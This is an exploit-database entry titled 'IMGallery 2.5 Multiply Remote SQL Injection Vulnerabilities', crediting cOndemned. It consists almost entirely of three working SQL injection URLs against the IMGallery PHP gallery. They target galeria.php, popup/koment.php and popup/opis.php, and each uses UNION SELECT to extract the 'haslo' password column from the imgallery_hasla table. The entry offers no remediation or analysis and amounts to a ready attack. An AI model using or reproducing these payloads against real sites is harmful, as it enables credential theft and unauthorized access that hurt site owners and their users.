id: 3028
date: 05/14/2008
title: IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities
author: cOndemned
cves: 

===========================================================
IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities
===========================================================


Name       : IMGallery 2.5 Multiply Remote SQL Injection Vulnerabilities
Author     : cOndemned
Conditions : magic_quotes_gpc = off ;/



http://[attacked_box]/[imgallery]/galeria.php?start=0&kategoria='+union+select+haslo,2,3+from+imgallery_hasla/*
http://[attacked_box]/[imgallery]/popup/koment.php?id_phot='-1+union+select+1,2,3,4,haslo+from+imgallery_hasla/*
http://[attacked_box]/[imgallery]/popup/opis.php?id_phot='+union+select+haslo+from+imgallery_hasla/*



#  0day.today [2023-03-24]  #